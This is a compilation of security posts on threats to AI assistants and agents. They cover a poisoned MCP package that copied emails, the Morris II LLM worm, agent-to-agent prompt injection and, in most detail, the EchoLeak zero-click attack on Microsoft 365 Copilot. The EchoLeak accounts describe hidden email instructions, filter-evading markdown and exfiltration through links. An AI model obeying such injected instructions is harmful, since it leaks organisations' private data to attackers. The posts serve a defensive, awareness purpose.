Closing the AI email security gap

The Trojan Agent: The Next Big AI Security Risk History repeats. The Greeks wheeled a gift horse into Troy. The Trojans celebrated. And then the soldiers climbed out at night and opened the gates. Fast forward to today: enterprises are rolling out AI agents everywhere. These agents do not just chat, they act. They send emails, touch financial systems, move data, and connect to your core business apps. The universal connector that makes this possible is called the Model Context Protocol, MCP. Think of it as the USB port for AI. Plug it in and your agent suddenly has access to your email, CRM, ERP, or code repo. And here is the catch: if that connector is poisoned, your AI becomes the perfect Trojan Horse. This is not theory. 🔸 A malicious package called postmark-mcp built trust over 15 clean releases before slipping in one line of code that quietly copied every email to an attacker. Invoices, contracts, password resets, even 2FA codes were siphoned off. Thousands of sensitive emails a day. Silent. Invisible. 🔸 Another flaw, CVE-2025-6514, showed how connecting to an untrusted MCP server could hand attackers remote code execution on your machine. Severity: critical. 🔸 Security researchers are already finding DNS rebinding issues, token misuse, and shadow MCPs running on developer laptops with full access to files, browsers, and company data. Why this matters for CEOs and boards: 🔸 It bypasses your firewalls. These connectors run inside your trusted environment. 🔸 It looks like business as usual. The AI still delivers the right output while leaking everything behind your back. 🔸 It is invisible to traditional security tools. Logs are minimal, reviews are skipped, and normal monitoring will not catch it. It scales with autonomy. An AI can make thousands of bad calls in minutes. Human-speed incident response can't keep up. Warning: If you treat AI connectors like harmless plugins, you are rolling a Trojan Horse straight through your gates. What you should be asking today: ✔ Can we inventory every AI connector in use? Or are developers pulling random ones from the internet? ✔ Do we only allow vetted, signed, and trusted connectors? Or are we taking anything that looks convenient? ✔ Are permissions scoped and temporary, or did we hand them god-like access? ✔ Do we have an audit trail showing who did what through which AI agent? Or will we be blind during an investigation? ✔ Do we block obvious exfiltration routes, like unknown SMTP traffic or shady domains? I am releasing a whitepaper soon. It breaks down real attacks, governance strategies, and a Security Maturity Model for leaders. The lesson is simple: AI connectors are not developer toys. They are the new supply chain risk. Treat them with the same rigor as financial systems or the next breach headline could be yours. 🔔 Follow Michael Reichstein for more AI security and governance #cybersecurity #ciso #aigovernance #riskmanagement #boardroom #strategy #leadership #supplychain

As generative AI tools become embedded across email, chat and knowledge systems, they introduce a novel breed of cyber-threat: self-propagating “LLM worms” that spread not via malicious code, but through hidden prompts and prompt-injection attacks. This whitepaper surveys the latest research (including the Morris II proof-of-concept worm), real-world vulnerabilities (such as Slack’s AI leak incident and CVE-2024-5184 in EmailGPT), and emerging attack vectors across multi-agent AI frameworks. It then outlines a layered defense strategy—combining robust prompt filtering, policy-driven guardrails, retrieval-pipeline hardening, and AI-aware monitoring—and recommends enterprise tools (e.g., NeMo Guardrails, LLM Guard, WhyLabs, Lasso) to shore up your AI environment. Finally, it presents red-team scenarios to validate your controls and governance guidance to ensure AI-driven risks are managed at the boardroom level. By understanding these worm-class threats and adopting best practices now, organizations can harness LLM innovation securely—and stay one step ahead of attackers who aim to weaponize AI.

📛 CVE 2025 32711 is a turning point Last week, we saw the first confirmed zero click prompt injection breach against a production AI assistant. No malware. No links to click. No user interaction. Just a cleverly crafted email quietly triggering Microsoft 365 Copilot to leak sensitive org data as part of its intended behavior. Here’s how it worked: • The attacker sent a benign-looking email or calendar invite • Copilot ingested it automatically as background context • Hidden inside was markdown-crafted prompt injection • Copilot responded by appending internal data into an external URL owned by the attacker • All of this happened without the user ever opening the email This is CVE 2025 32711 (EchoLeak). Severity 9.3 Let that sink in. The AI assistant did exactly what it was designed to do. It read context, summarized, assisted. But with no guardrails on trust boundaries, it blended attacker inputs with internal memory. This wasn’t a user mistake. It wasn’t a phishing scam. It was a design flaw in the AI data pipeline itself. 🧠 The Novelty What makes this different from prior prompt injection? 1. Zero click. No action by the user. Sitting in the inbox was enough 2. Silent execution. No visible output or alerts. Invisible to the user and the SOC 3. Trusted context abuse. The assistant couldn’t distinguish between hostile inputs and safe memory 4. No sandboxing. Context ingestion, generation, and network response occurred in the same flow This wasn’t just bad prompt filtering. It was the AI behaving correctly in a poorly defined system. 🔐 Implications For CISOs, architects, and Copilot owners - read this twice. → You must assume all inputs are hostile, including passive ones → Enforce strict context segmentation. Copilot shouldn’t ingest emails, chats, docs in the same pass → Treat prompt handling as a security boundary, not just UX → Monitor agent output channels like you would outbound APIs → Require your vendors to disclose what their AI sees and what triggers it 🧭 Final Thought The next wave of breaches won’t look like malware or phishing. They will look like AI tools doing exactly what they were trained to do but in systems that never imagined a threat could come from within a calendar invite. Patch if you must. But fix your AI architecture before the next CVE hits.

Imagine receiving what looks like a routine business email. You never even open it. Within minutes, your organisation’s most sensitive data is being silently transmitted to attackers. This isn’t science fiction. It happened with EchoLeak. AIM Security’s research team discovered the first zero-click AI vulnerability, targeting Microsoft 365 Copilot. The attack is elegant and terrifying: a single malicious email can trick Copilot into automatically exfiltrating email histories, SharePoint documents, Teams conversations, and calendar data. No user interaction required. No suspicious links to click. The AI agent does all the work for the attacker. Here’s what caught my attention as a security professional: The researchers bypassed Microsoft’s security filters using conversational prompt injection – disguising malicious instructions as normal business communications. They exploited markdown formatting quirks that Microsoft’s filters missed. Then they used browser behaviour to automatically trigger data theft when Copilot generated responses. Microsoft took five months to patch this (CVE-2025-32711). That timeline tells you everything about how deep this architectural flaw runs. The broader implication: this isn’t a Microsoft problem, it’s an AI ecosystem problem. Any AI agent that processes untrusted inputs alongside internal data faces similar risks. For Australian enterprises racing to deploy AI tools, EchoLeak exposes a critical blind spot. We’re securing the AI like it’s traditional software, but AI agents require fundamentally different security approaches. The researchers call it “LLM Scope Violation” – when AI systems can’t distinguish between trusted instructions and untrusted data. It’s a new vulnerability class that existing frameworks don’t adequately address. Three immediate actions for security leaders: • Implement granular access controls for AI systems • Deploy advanced prompt injection detection beyond keyword blocking • Consider excluding external communications from AI data retrieval EchoLeak proves that theoretical AI risks have materialised into practical attack vectors. The question isn’t whether similar vulnerabilities exist in other platforms – it’s when they’ll be discovered. #AISecurity #CyberSecurity #Microsoft365 #EnterpriseAI #InfoSec #Australia #TechLeadership https://lnkd.in/gNfxV3Nk

“Have your agent speak to my agent.” Coming soon to a workplace near you: - Calls by agents answered by agents. - Emails written and sent by agents read and responded to by agents. On the surface, this sounds like efficiency heaven — machines handling the noise so humans can focus on the signal. But beneath it lies a very real danger. When communication chains become machine-to-machine, we’re not just talking about faster workflows — we’re talking about new attack surfaces. The Risk Traditional phishing relies on human error: a misplaced click, a fake invoice, a spoofed email. With AI agents in the loop, the game changes: Prompt Injection: malicious actors embed hidden instructions inside messages, documents, or even data feeds. If an agent reads them, it may execute actions outside its intended scope. Agent Manipulation: a cleverly crafted request could trick one agent into leaking data, initiating transactions, or escalating privileges — and another agent may obediently carry out the chain reaction. Amplified Scale: unlike humans, agents don’t get tired, suspicious, or distracted. If compromised, they can be manipulated consistently, at speed, and at scale. This isn’t phishing as we know it. It’s phishing 2.0 — machine-to-machine deception, invisible to most of us until damage is already done. Staying Safe Organisations will need to rethink security in an agent-driven world: Guardrails & Sandboxing: ensure agents operate within strictly defined boundaries — never with unconstrained access. Input Validation: treat every external input (email, attachment, call transcript) as potentially hostile, even if it “looks” routine. Audit & Transparency: require logs, explanations, and human-visible checkpoints before sensitive actions. Zero-Trust Mindset: don’t assume a message from an “agent” is safe just because it came from a trusted domain. The future will be “agent-to-agent.” The challenge is to make sure it’s not “attacker-to-agent.” Because when your agent speaks to mine, we need to be confident they’re not both being played.

One of the core themes I'm tracking closely (starting next month) is understanding the best solutions for preventing data exfiltration and the role that security for AI/LLMs companies will play in solving this issue for enterprises. I'm interested in seeing how the AI security category inflects this year in helping organizations prevent data leakage relative to other areas like data security (specifically data loss prevention (DLP)), which I wrote about last month. Let's explore the relationship between data security (DLP-focused) vendors relative to security for AI vendors for a moment. While there are many AI security vendors, I find it interesting to see what Prompt Security has built in and around preventing data leakage. The rise of ChatGPT and Microsoft 365 Copilot continues to transform how enterprises work—but it’s also exposing them to new data risks that legacy Data Loss Prevention (DLP) solutions weren’t built to handle. We've seen GenAI introduce dynamic risks around: - Shadow AI: Undetected tools used by employees. - Prompt Injection: Malicious manipulation of AI outputs. - Sensitive data leaks: Unintentional data exposure during AI interactions. What I'm seeing is that AI security companies like Prompt Security or others are managing this risk for organizations better in Gen-AI enterprise stack. Unlike legacy DLP / Data security vendors, they are showing better promise at: 1) Redacting sensitive data in real-time before it reaches GenAI tools. For example, we see better detection capabilities from pattern matching to contextual AI-based detection: for instance, DLPs like Zscaler can detect a social security number, but companies like Prompt can detect a corporate document with intellectual property better. 2) Better at detecting unauthorized AI tool usage (Shadow AI) across M365 AI tools, Github co-pilots and many more 3) Better at preventing AI-specific attacks like prompt injections. 4) These companies are able to surface educational popups so that employees or users are aware of when they're using an AI site or have violated the company AI policy 5) Full observability of AI usage and ensuring compliance. In general, AI security startups like prompt security (and a few others too) are showing they can dynamically adapt to the fluid, unstructured nature of data as it deals with GenAI interactions and take actions as needed with an agent or extension. In 2025, as more organizations embrace GenAI to stay competitive, data security is top of mind / foundational, so it'll be interesting to see how GenAI startups vs legacy DLP / data security vendors interact in this market. This is a trend to watch and I'll be uncovering this theme closely later next month!

I feel like I'm late to the game knowing about this Copilot attack vector. <dang>. This 𝗭𝗲𝗿𝗼-𝗖𝗹𝗶𝗰𝗸 𝗔𝗜 𝗗𝗮𝘁𝗮 𝗟𝗲𝗮𝗸 𝗶𝗻 𝗠𝗶𝗰𝗿𝗼𝘀𝗼𝗳𝘁 𝗖𝗼𝗽𝗶𝗹𝗼𝘁 is a 𝘄𝗮𝗸𝗲-𝘂𝗽 𝗰𝗮𝗹𝗹 𝗳𝗼𝗿 𝘀𝗼𝗳𝘁𝘄𝗮𝗿𝗲 𝗮𝗿𝗰𝗵𝗶𝘁𝗲𝗰𝘁𝘀 A new vulnerability dubbed EchoLeak (CVE-2025-32711) was quietly disclosed and patched in Microsoft 365 Copilot. Here’s the chilling part: it was a zero-click exfiltration attack. No phishing link. No user interaction. Just a malicious email… and an overly helpful AI assistant. Copilot, trying to be useful, pulled in context from an attacker-crafted email. Hidden in that message was a prompt injection. The result? Sensitive info was leaked through a markdown link—without the user ever doing anything. As a software architect and AI researcher, I’m not just watching the vulnerabilities. I’m mapping the architectural fault lines. This is more than a security patch—it’s a signal flare: ++ LLMs are dynamic runtimes, not passive tools. ++ RAG pipelines can turn helpful summarization into autonomous breach vectors. ++ Without AI-specific threat modeling, traditional controls fall flat. We must shift our architecture thinking: --> Design for context isolation and prompt sanitation. --->Harden the RAG pipelines and avoid untrusted data ingestion by default. --> Implement output auditing to detect exfil paths like markdown/image links. Yes, you always hear me say that 𝗚𝗲𝗻𝗔𝗜 𝗵𝗮𝘀 𝗴𝗿𝗼𝘂𝗻𝗱𝗯𝗿𝗲𝗮𝗸𝗶𝗻𝗴 𝗽𝗼𝘁𝗲𝗻𝘁𝗶𝗮𝗹 𝘄𝗶𝘁𝗵 𝗰𝗵𝗮𝗹𝗹𝗲𝗻𝗴𝗲𝘀 𝗮𝗻𝗱 𝗹𝗶𝗺𝗶𝘁𝗮𝘁𝗶𝗼𝗻𝘀... It is changing the entire SDLC including how architects need to defend against how attackers exfiltrate. The link to the article is in the comments. #ArchAITecture #AI4SDLC #SecureByDesign #GenAI

Your employees are using AI right now without telling you. And most have no idea they're creating security risks. Here are the 7 AI threats every employee needs to recognize: It's Cybersecurity Awareness Month, and I'm teaming up with Cisco to focus the entire month on "Cybersecurity Awareness Month in the Age of AI." Week 1 is all about building AI awareness for everyone in your organization. The biggest AI security risks aren't coming from sophisticated hackers. They're coming from well-meaning employees who don't understand the risks. 1️⃣ Shadow AI Usage 🎯 Your team is uploading sensitive data to ChatGPT, Claude, and other public AI tools without realizing it becomes training data. What to watch for: Employees copying customer data, financial information, or proprietary processes into AI chat interfaces. 2️⃣ Prompt Injection Attacks 🔧 Malicious instructions hidden in documents or emails can hijack AI tools to perform unintended actions. What to watch for: Suspicious files designed to be processed by AI tools, or unusual AI outputs that don't match your request. 3️⃣ AI-Generated Phishing 📧 Attackers use AI to create highly personalized, convincing phishing emails that bypass traditional detection. What to watch for: Emails that reference specific company information or personal details with unusual accuracy. 4️⃣ Deepfake Social Engineering 🎭 Voice and video deepfakes of executives requesting urgent financial transfers or sensitive information. What to watch for: Unusual urgency in voice/video calls, especially regarding financial transactions or access requests. 5️⃣ AI Hallucination Risks 🤖 AI tools confidently provide incorrect information that employees act on without verification. What to watch for: AI providing "facts" about regulations, procedures, or technical specifications without sources. 6️⃣ Over-Privileged AI Access 🔑 Employees giving AI tools access to company systems, databases, or applications they shouldn't touch. What to watch for: AI tools requesting system permissions or being connected to business-critical applications. 7️⃣ AI-Powered Reconnaissance 🕵️ Attackers use AI to analyze your public information and social media to plan targeted attacks. What to watch for: Unusually specific knowledge about your organization in unsolicited communications. The Reality: Every employee using AI becomes a potential security risk or security asset. The difference is awareness and training. Education tip: Create simple rules like "AI confidence doesn't equal AI accuracy" and "if you wouldn't post it on social media, don't put it in public AI." What AI security concern do you hear most from your team? Share it in the comments - let's educate each other ⬇️ ♻️ Repost this if your organization needs this awareness. Follow 👉🏼 Gerald Auger, Ph.D. for more Cybersecurity Awareness Month insights.